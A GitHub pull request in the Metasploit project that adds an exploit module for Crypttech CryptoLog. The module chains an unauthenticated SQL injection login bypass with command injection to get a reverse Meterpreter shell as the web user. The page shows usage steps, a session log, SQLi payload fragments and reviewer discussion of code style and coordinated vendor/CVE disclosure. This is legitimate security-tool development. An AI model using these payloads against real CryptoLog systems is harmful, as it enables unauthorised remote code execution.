Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add module Crypttech CryptoLog Remote Code Execution #8331

Merged
merged 6 commits into from May 5, 2017

Conversation

@mmetince
Copy link
Contributor

commented May 2, 2017

This module exploits the sql injection and command injection vulnerability of CryptoLog. An un-authenticated user can execute a terminal command under the context of the web user.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploits/linux/http/cryptolog_exec.rb
  • set RHOST <YOUR_TARGET>
  • python/meterpreter/reverse_tcp is configured as a default payload. Change it if you need. Most of the case, you're okay go with default payload type.
  • set LHOST <LOCAL IP>
  • exploit and then verify the following output.
msf exploit(cryptolog) > exploit 

[*] Started reverse TCP handler on 12.0.0.3:4444 
[*] Bypassing login by exploiting SQLi flaw
[+] Successfully logged in
[*] Exploiting command injection flaw
[*] Sending stage (39832 bytes) to 12.0.0.45
[*] Meterpreter session 3 opened (12.0.0.3:4444 -> 12.0.0.45:51991) at 2017-05-02 18:04:52 -0400

meterpreter > getuid
Server username: www-data
meterpreter > pwd
/var/www/cryptolog
meterpreter >

It's not possible to download free trial of this product. Where can I send pcap file that I've recorded during exploitation ?

@busterb

This comment has been minimized.

Copy link
Member

commented May 2, 2017

Send pcaps to msfdev@metasploit.com

@mmetince

This comment has been minimized.

Copy link
Contributor Author

commented May 2, 2017

Thanks @busterb let me know if you haven't received the e-mail.

@busterb

This comment has been minimized.

Copy link
Member

commented May 3, 2017

got it, thanks!

login.php endpoint is responsible for login process. One of the user supplied parameter is used by the application without input validation
and parameter binding. Which cause a sql injection vulnerability. Successfully exploitation of this vulnerability gives us the valid session.
logshares_ajax.php endpoint is repsonsible for executing a operation system command. It's not possible to access this endpoint without having

This comment has been minimized.

Copy link
@jvoisin

jvoisin May 3, 2017

Contributor

*reponsible

'Payload' => 'python/meterpreter/reverse_tcp'
},
'Platform' => ['python'],
'Arch' => ARCH_PYTHON,

This comment has been minimized.

Copy link
@jvoisin

jvoisin May 3, 2017

Contributor

Why ARCH_PYTHON instead of ARCH_CMD?

This comment has been minimized.

Copy link
@mmetince

mmetince May 3, 2017

Author Contributor

Because, I ❤️ meterpreter. I always try to convert ARCH_CMD to ARCH_PYTHON or other type of payload that gives a meterpreter shell instead of traditional one.

This comment has been minimized.

Copy link
@jvoisin

jvoisin May 3, 2017

Contributor

Sure, but what if my target doesn't come with Python?
You can always use the magical "shell2meterpreter" module once you've got a shell ;)

This comment has been minimized.

Copy link
@mmetince

mmetince May 3, 2017

Author Contributor

I forgot to mention that, this product is shipped as an Linux ISO. :)

'act' => 'login'
},
'vars_post' => {
'user' => "#{r}' OR #{i}=#{i}-- #{r}",

This comment has been minimized.

Copy link
@jvoisin

jvoisin May 3, 2017

Contributor

There is no need to pre and post-fix with #{r} here, isn't it?

This comment has been minimized.

Copy link
@mmetince

mmetince May 3, 2017

Author Contributor

Thanks for review @jvoisin . You're right. I convert it to the shorter form.

@jmartin-r7

This comment has been minimized.

Copy link
Contributor

commented May 3, 2017

Since there are multiple softwares named “CryptoLog”, it would be useful to rename module to be more specific on vendor as well as attack vector. Something like "crypttech_cryptolog_login_exec" would help users know what this applies to at a glance.

@mmetince

This comment has been minimized.

Copy link
Contributor Author

commented May 3, 2017

Totally agreed @jmartin-r7 . Shall I change the title of the module to something like "Crypttech CryptoLOG Remote Code Execution" or leave it as is ?

@jmartin-r7

This comment has been minimized.

Copy link
Contributor

commented May 3, 2017

Please expand the tile as well, it may also be possible to create a CVE reference for this if you have not already gone that route.

We can assist with reporting to MITRE and potential CVE assignment, if you need to send more details they can go to security@rapid7.com. Public key is here: https://www.rapid7.com/disclosure/ if you would like to send anything securely.

@todb-r7

This comment has been minimized.

Copy link
Contributor

commented May 3, 2017

+1 to @jmartin-r7 -- @mmetince, if you could provide a contact at the vendor that you already talked to so we can make sure they're on that same page, if they have an issue number to track this, that'd be swell.

We can deal with the vendor, CERT/CC, MITRE, and all the other foo around disclosure so you can keep on hackin'. :) Since all the details are public now, I don't see a ton of upside to PGP, but it's there if you'd like it.

@jmartin-r7 jmartin-r7 self-assigned this May 3, 2017

@mmetince

This comment has been minimized.

Copy link
Contributor Author

commented May 4, 2017

Thanks everyone for helping! I've send details to the security@rapid7.com . Let me know if I should make additional changes on this PR.

@jmartin-r7
Copy link
Contributor

left a comment

Let me know if you decide to consolidate on the method call for the request, will land once you decide.

'user' => "' OR #{i}=#{i}#",
'pass' => "#{r}"
}
})

This comment has been minimized.

Copy link
@jmartin-r7

jmartin-r7 May 5, 2017

Contributor

Looks like you could consolidate lines 56-69 and 81-94 into a local method, may need to take a parameter for the user value. Not required but would be appreciated to reduce code.

This comment has been minimized.

Copy link
@mmetince

mmetince May 5, 2017

Author Contributor

Agreed. I've made a necessary changes and tested again;) all good.

mmetince added 2 commits May 5, 2017

@jmartin-r7 jmartin-r7 merged commit 720a02f into rapid7:master May 5, 2017

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed
Details
jmartin-r7 added a commit that referenced this pull request May 5, 2017
@jmartin-r7

This comment has been minimized.

Copy link
Contributor

commented May 5, 2017

Release Notes

The exploits/linux/http/crypttech_cryptolog_login_exec exploit has been added to the framework. The module exploits an SQL injection vulnerability to perform command injection on Crypttech CryptoLOG. An un-authenticated user can execute any terminal command under the context of the web user.

@mmetince mmetince deleted the mmetince:cryptolog_exec branch May 6, 2017

@todb-r7 todb-r7 changed the title Adding module CryptoLog Remote Code Execution Add module Crypttech CryptoLog Remote Code Execution May 8, 2017

@todb-r7 todb-r7 referenced this pull request Jun 15, 2017
3 of 3 tasks complete
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
7 participants
You can’t perform that action at this time.